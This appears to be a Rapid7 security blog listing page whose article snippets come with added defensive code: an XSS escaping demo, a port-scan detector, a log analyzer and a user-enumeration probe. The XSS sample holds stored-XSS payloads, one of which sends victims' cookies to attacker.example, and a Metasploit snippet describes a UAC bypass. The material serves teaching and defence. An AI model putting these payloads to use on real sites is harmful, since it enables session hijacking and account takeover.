
2 min Vulnerability Disclosure

R7-2017-06 | CVE-2017-5241: Biscom SFT XSS (FIXED)

Summary The Workspaces component of Biscom Secure File Transfer (SFT) version 5.1.1015 is vulnerable to stored cross-site scripting in two fields. An attacker would need the ability to create a Workspace and entice a victim to visit the malicious page in order to run malicious JavaScript in the context of the victim's browser. Since the victim is necessarily authenticated, this can allow the attacker to perform actions on the Biscom Secure File Transfer instance on the victim's behalf.
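The pattern behind a stored XSS like this is a field that is saved verbatim and later interpolated into a page as markup. The following is an added illustration, not Biscom's code: the two field names and the sample payloads are assumptions, since the advisory summary above does not name the affected fields. It shows the unsafe rendering beside the entity-encoded version, plus the check a reviewer can run on rendered output to confirm that nothing from a stored value survives as live markup.

```python
import html
import re

# Constructed sample of attacker-controlled Workspace fields (not taken from the advisory;
# the two affected fields are not named there, so "name" and "description" are assumptions).
ATTACKER_WORKSPACE = {
    "name": "Q3 Audit <img src=x onerror=\"fetch('/share?to=attacker')\">",
    "description": "<script>location='https://attacker.example/?c='+document.cookie</script>",
}

def render_vulnerable(ws):
    """Interpolates stored fields straight into HTML: the stored-XSS sink."""
    return (
        f'<h2 class="ws-name">{ws["name"]}</h2>\n'
        f'<p class="ws-desc">{ws["description"]}</p>'
    )

def render_hardened(ws):
    """Same markup, but every stored value is entity-encoded for an HTML text context."""
    return (
        f'<h2 class="ws-name">{html.escape(ws["name"], quote=True)}</h2>\n'
        f'<p class="ws-desc">{html.escape(ws["description"], quote=True)}</p>'
    )

# The only tags the template itself is allowed to emit.
_TEMPLATE_TAG = re.compile(r"</?(h2|p)\b[^>]*>")
# A '<' followed by a letter, '/' or '!' is something the browser parses as a tag.
_LIVE_MARKUP = re.compile(r"<[A-Za-z/!]")

def contains_live_markup(rendered):
    """True if anything other than the template's own <h2>/<p> tags survives as live markup."""
    leftover = _TEMPLATE_TAG.sub("", rendered)
    return bool(_LIVE_MARKUP.search(leftover))
```

Because the victim is already authenticated, the payload in the sample runs with their session; output encoding in the right context (here, HTML text) is the fix, and the `contains_live_markup` check is a cheap regression test to keep beside the template.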

2 min Public Policy

Legislation to Strengthen IoT Marketplace Transparency

Senator Ed Markey (D-MA) is poised to introduce legislation to develop a voluntary cybersecurity standards program for the Internet of Things (IoT). The legislation, called the Cyber Shield Act, would enable IoT products that comply with the standards to display a label indicating a strong level of security to consumers – like an Energy Star rating for IoT. Rapid7 supports this legislation and believes greater transpa

2 min Automation and Orchestration

Setting Up and Managing a Bug Bounty Program

Synopsis Bug bounties have become mainstream, and rightfully so. They offer a method to access and harness the intelligence of a varied set of expert hackers and security researchers without having to incur the cost of hiring an army of security professionals. The main advantage, though, is that one can keep a step ahead of the malicious hackers. This article talks about how to set up a bug bounty program and some of the pitfalls to watch out for. When to do a Bug Bounty? One obvious question that w

5 min Automation and Orchestration

How to Install and Use PSAD IDS on Ubuntu Linux

Synopsis PSAD, also known as Port Scan Attack Detector, is a collection of lightweight system daemons that run on a Linux system and analyze iptables log messages to detect port scans and other suspicious traffic. With auto-blocking enabled, PSAD can also add iptables rules against offending sources, turning it from an intrusion detection system into an intrusion prevention system. PSAD uses Snort rules for the detection of intrusion events. It is specially designed to work with Linux iptables/firewalld to detect suspicious traffic such as port scans, backdoors and botnet comman
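The core of what PSAD does with those iptables log messages is simple enough to show directly: parse the kernel LOG lines, group them by source address, and raise an alert when one source touches many distinct ports in a short window. The block below is an added example written for this page, not PSAD's own code; the log lines are constructed, and the danger-level thresholds are loosely modeled on PSAD's default `DANGER_LEVEL` settings (an assumption to check against `/etc/psad/psad.conf` on your host).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed iptables LOG lines in syslog format, standing in for /var/log/messages.
# 203.0.113.5 probes eight ports in a few seconds; 198.51.100.7 only ever hits 443.
SAMPLE_LOG = """\
Jun 16 10:01:02 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=40000 DPT=21 WINDOW=1024 RES=0x00 SYN URGP=0
Jun 16 10:01:02 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=40000 DPT=22 WINDOW=1024 RES=0x00 SYN URGP=0
Jun 16 10:01:03 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=40000 DPT=23 WINDOW=1024 RES=0x00 SYN URGP=0
Jun 16 10:01:03 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=40000 DPT=25 WINDOW=1024 RES=0x00 SYN URGP=0
Jun 16 10:01:04 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=40000 DPT=80 WINDOW=1024 RES=0x00 SYN URGP=0
Jun 16 10:01:05 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=40000 DPT=443 WINDOW=1024 RES=0x00 SYN URGP=0
Jun 16 10:01:06 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=44 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=TCP SPT=40000 DPT=3389 WINDOW=1024 RES=0x00 SYN URGP=0
Jun 16 10:01:06 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=40001 DPT=53 LEN=40
Jun 16 10:01:07 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.5 DST=192.0.2.10 LEN=84 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=7 SEQ=1
Jun 16 10:01:02 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=192.0.2.10 LEN=60 TOS=0x00 PREC=0x00 TTL=60 ID=0 DF PROTO=TCP SPT=51000 DPT=443 WINDOW=29200 RES=0x00 SYN URGP=0
Jun 16 10:01:20 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=192.0.2.10 LEN=60 TOS=0x00 PREC=0x00 TTL=60 ID=0 DF PROTO=TCP SPT=51001 DPT=443 WINDOW=29200 RES=0x00 SYN URGP=0
Jun 16 10:01:45 gw kernel: IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.7 DST=192.0.2.10 LEN=60 TOS=0x00 PREC=0x00 TTL=60 ID=0 DF PROTO=TCP SPT=51002 DPT=443 WINDOW=29200 RES=0x00 SYN URGP=0
"""

LOG_RE = re.compile(
    r"^(?P<mon>\w{3})\s+(?P<day>\d+)\s+(?P<time>\d\d:\d\d:\d\d)\s+\S+\s+kernel:.*?"
    r"SRC=(?P<src>\S+)\s+DST=(?P<dst>\S+).*?PROTO=(?P<proto>\w+)"
    r"(?:.*?SPT=(?P<spt>\d+)\s+DPT=(?P<dpt>\d+))?"
)

# (distinct ports, danger level): loosely modeled on psad's default DANGER_LEVEL1..5
# thresholds (assumed values; the real ones live in /etc/psad/psad.conf).
DANGER_THRESHOLDS = [(5, 1), (15, 2), (150, 3), (1500, 4), (10000, 5)]

def parse_line(line, year=2017):
    """Pull timestamp, addresses, protocol and destination port out of one LOG line."""
    m = LOG_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "src": m["src"], "dst": m["dst"], "proto": m["proto"],
            "dpt": int(m["dpt"]) if m["dpt"] else None}

def danger_level(distinct_ports):
    level = 0
    for threshold, lvl in DANGER_THRESHOLDS:
        if distinct_ports >= threshold:
            level = lvl
    return level

def detect_scans(log_text, window_seconds=60):
    """Flag sources that hit many distinct (proto, port) pairs within window_seconds."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines())
              if e and e["dpt"] is not None]          # ICMP has no DPT; skip it here
    events.sort(key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        best, start = 0, 0
        for end in range(len(evs)):                   # sliding time window per source
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            ports = {(e["proto"], e["dpt"]) for e in evs[start:end + 1]}
            best = max(best, len(ports))
        lvl = danger_level(best)
        if lvl:
            alerts[src] = {"distinct_ports": best, "danger_level": lvl}
    return alerts
```

None of this works without log data: PSAD relies on the firewall having `LOG` rules (typically a final `iptables -A INPUT -j LOG` and `iptables -A FORWARD -j LOG` after the accept rules) so that rejected packets actually reach syslog. The auto-blocking mentioned above is the step that turns an alert like the one returned here into a new `DROP` rule for the source.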

4 min Automation and Orchestration

How to Install and Configure Bro on Ubuntu Linux

Synopsis Bro is a free, open source, Unix-based network analysis framework started by Vern Paxson. Bro provides a comprehensive platform for collecting network measurements, conducting forensic investigations and traffic baselining. Bro comes with a powerful analysis engine, which makes it both a capable intrusion detection system and a network analysis framework. Bro comes with a powerful set of features, some of which are listed below: * Runs on commodity hardware and supports Linux, FreeBSD and macOS.

4 min Automation and Orchestration

Information Security Risk Management - Introduction

Synopsis Information security risk management is a wide topic, with many notions, processes, and technologies that are often confused with each other. Very often technical solutions (cybersecurity products) are presented as “risk management” solutions without process-related context. Modern cybersecurity risk management is not possible without

4 min Automation and Orchestration

Information Security Risk Management - Tiered Approach of NIST SP 800-39

Synopsis Information security risk management is a wide topic, with many notions, processes, and technologies that are often confused with each other. In this series of articles, I explain notions and describe processes related to risk management. I also review NIST and ISO standards related to information security risk management. In the previous article

4 min Automation and Orchestration

Information Security Risk Management Cycle - Context Establishment Phase

Synopsis Information security risk management is a wide topic, with many notions, processes, and technologies that are often confused with each other. In this series of articles, I explain notions and describe processes related to risk management. I also review NIST and ISO standards related to information security risk management. In the previous article, I reviewed the tiered risk management approach described in NIS

5 min Automation and Orchestration

The Effective Components of Security Orchestration

It’s one thing to have a plan for security orchestration, but it’s another to get it up and running and use it to its full potential. At this point, most security professionals know that security orchestration and automation are a “need to have,” not a “nice to have,” but to fully leverage security orchestration, there are a few considerations that will help yo

6 min InsightOps

What is BDD Testing: Practical Examples of Behavior Driven Development Testing

The Need for Behavior Driven Development (BDD) Testing Tools It should come as no surprise to learn that testing is at the heart of our engineers' daily activities. Testing is intrinsic to our development process, both in practical terms and in our thinking. Our engineers work with complex systems that are made up of complex components. Individual components may have many external dependencies. When testing, the scope of what is to be tested is important – it can be system wide, focused on a p

5 min InsightOps

5 Ways to Use Log Data to Analyze System Performance

Analyzing System Performance Using Log Data Recently we examined some of the most common behaviors that our community of 25,000 users looked for in their logs, with a particular focus on web server logs. In fact, our research identified the top 15 web server tags and alerts created by our customers—you can read more about these in our https://logentries.com/doc/community-insights/ section—and you can also easily create tags or alerts based on the patterns to identify these behaviors in your sys
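Tags and alerts built from log patterns are only useful when the underlying computation is right, so the following added example (written for this page, not Logentries' or Rapid7's code) shows the minimum a practitioner needs for web server logs: parse combined-format lines carrying a trailing response-time field, tag each request (server error, client error, slow), compute a nearest-rank p95 latency, and raise alerts on the 5xx rate and the p95. The log lines and the thresholds are constructed for the example.

```python
import math
import re
from collections import Counter

# Constructed sample: combined log format with the response time in seconds appended
# (the Apache "%D"-style or nginx "$request_time" field that many setups add at the end).
SAMPLE_ACCESS_LOG = """\
192.0.2.1 - - [16/Jun/2017:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 0.120
192.0.2.2 - - [16/Jun/2017:10:00:02 +0000] "GET /static/app.js HTTP/1.1" 200 80210 "-" "Mozilla/5.0" 0.090
192.0.2.3 - - [16/Jun/2017:10:00:02 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0" 0.030
192.0.2.1 - - [16/Jun/2017:10:00:05 +0000] "POST /login HTTP/1.1" 200 1320 "-" "Mozilla/5.0" 0.250
192.0.2.4 - - [16/Jun/2017:10:00:07 +0000] "GET /api/export HTTP/1.1" 500 512 "-" "curl/7.52" 2.400
192.0.2.5 - - [16/Jun/2017:10:00:08 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 0.080
192.0.2.6 - - [16/Jun/2017:10:00:09 +0000] "GET /old HTTP/1.1" 302 0 "-" "Mozilla/5.0" 0.010
192.0.2.7 - - [16/Jun/2017:10:00:11 +0000] "GET /search?q=logs HTTP/1.1" 200 22110 "-" "Mozilla/5.0" 1.700
192.0.2.4 - - [16/Jun/2017:10:00:12 +0000] "GET /api/export HTTP/1.1" 503 0 "-" "curl/7.52" 0.005
192.0.2.8 - - [16/Jun/2017:10:00:14 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 0.140
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "[^"]*" (?P<rt>[\d.]+)$'
)

def parse_access_log(text):
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:   # lines that do not match the format are skipped, not guessed at
            rows.append({"ip": m["ip"], "path": m["path"],
                         "status": int(m["status"]), "rt": float(m["rt"])})
    return rows

def percentile(values, pct):
    """Nearest-rank percentile (pct in (0, 100]); no interpolation, so p95 is a real sample."""
    if not values:
        return 0.0
    ordered = sorted(values)
    rank = max(1, math.ceil(pct / 100 * len(ordered)))
    return ordered[rank - 1]

def tag_request(row, slow_threshold=1.0):
    """The per-line tags an alerting rule would key on."""
    tags = []
    if row["status"] >= 500:
        tags.append("server_error")
    elif row["status"] >= 400:
        tags.append("client_error")
    if row["rt"] > slow_threshold:
        tags.append("slow_request")
    return tags

def summarize(rows, error_rate_alert=0.05, p95_alert=1.0):
    """Aggregate tags, error rate, p95 latency and the slowest paths; emit alerts past thresholds."""
    total = len(rows)
    tag_counts = Counter(t for r in rows for t in tag_request(r))
    error_rate = tag_counts["server_error"] / total if total else 0.0
    p95 = percentile([r["rt"] for r in rows], 95)
    slowest = Counter()
    for r in rows:
        slowest[r["path"]] = max(slowest[r["path"]], r["rt"])
    alerts = []
    if error_rate > error_rate_alert:
        alerts.append(f"5xx rate {error_rate:.1%} exceeds {error_rate_alert:.0%}")
    if p95 > p95_alert:
        alerts.append(f"p95 latency {p95:.2f}s exceeds {p95_alert:.2f}s")
    return {"requests": total, "tags": dict(tag_counts), "error_rate": error_rate,
            "p95": p95, "slowest_paths": slowest.most_common(3), "alerts": alerts}
```

The nearest-rank percentile is deliberate: an interpolated p95 can report a latency no request actually had, which is confusing when someone goes looking for the offending line. Rates are computed over all requests in the window, so a burst of 5xx on one endpoint (here `/api/export`) shows up both in the alert and in the slowest-path list.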

2 min Metasploit

Metasploit Wrapup: June 16, 2017

A fresh, new UAC bypass module for Windows 10! Leveraging the behavior of fodhelper.exe and a writable registry key as a normal user, you too can be admin! Unpatched as of last week, this bypass module works on Windows 10 only, but it works like a charm! Reach out and allocate something This release offers up a fresh denial/degradation of service exploit against hosts running a vulnerable version of rpcbind. Specifically, you can repea

4 min Microsoft

Announcing Microsoft Azure Asset Discovery in InsightVM

Almost every security or IT practitioner is familiar with the ascent and continued dominance of Amazon Web Services (AWS). But you only need to peel back a layer or two to find Microsoft Azure growing its own market share and establishing its position as the most-used, most-likely-to-renew

4 min Public Policy

Rapid7 issues comments on NAFTA renegotiation

In April 2017, President Trump issued an executive order directing a review of all trade agreements. This process is now underway: The United States Trade Representative (USTR) – the nation's lead trade agreement negotiator – formally requested public input on objectives for the renegotiation of the North American Free Trade Agreement (NAFTA). NAFTA is a trade agreement between the US, Canada, and Mexico, that covers a huge range of topics, fr

4 min Application Security

What Is User Enumeration?

User enumeration is when a malicious actor can use brute force to either guess or confirm valid users in a system, typically by observing that the application responds differently to a valid account than to a nonexistent one.
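The most common place this shows up is a login form whose failure message (or response time) differs between "no such user" and "wrong password". The block below is an added example written for this page, not code from the post: a deliberately enumerable login beside a uniform one, and the probe a tester runs against either to confirm whether account existence leaks. The user store, salt and credentials are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Constructed user store for the demonstration (not from the post). A real store keeps a
# per-user random salt; one fixed salt is used here only to keep the two login functions short.
_SALT = b"demo-salt-not-for-production"
_ITERATIONS = 50_000

def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)

USERS = {"alice": _hash("correct horse battery staple")}

# Hash of a random throwaway secret so that a lookup miss still pays the full PBKDF2 cost.
_DUMMY_HASH = _hash(secrets.token_hex(16))

def login_enumerable(username: str, password: str) -> str:
    """Vulnerable: the message reveals whether the account exists, and an unknown user
    returns early without hashing, so the response time differs as well."""
    if username not in USERS:
        return "unknown user"
    if hmac.compare_digest(USERS[username], _hash(password)):
        return "ok"
    return "wrong password"

def login_uniform(username: str, password: str) -> str:
    """Hardened: one failure message, and the same hashing work for every username."""
    stored = USERS.get(username, _DUMMY_HASH)
    matches = hmac.compare_digest(stored, _hash(password))
    if username in USERS and matches:
        return "ok"
    return "invalid username or password"

def enumeration_probe(login, known_user="alice", unknown_user="nobody-1f3a"):
    """The check a tester runs: submit a wrong password for an account known to exist and for
    one that does not, and report whether the two responses are distinguishable."""
    wrong = "definitely-not-the-password"
    r_known = login(known_user, wrong)
    r_unknown = login(unknown_user, wrong)
    return {
        "known_response": r_known,
        "unknown_response": r_unknown,
        "distinguishable": r_known != r_unknown,
    }
```

The probe only compares response bodies; a timing oracle needs many samples per case and a statistical comparison, which is why `login_uniform` hashes against a dummy value on a miss rather than trusting a single measurement. Registration ("username already taken") and password-reset ("no account with that e-mail") endpoints leak the same information and deserve the same probe.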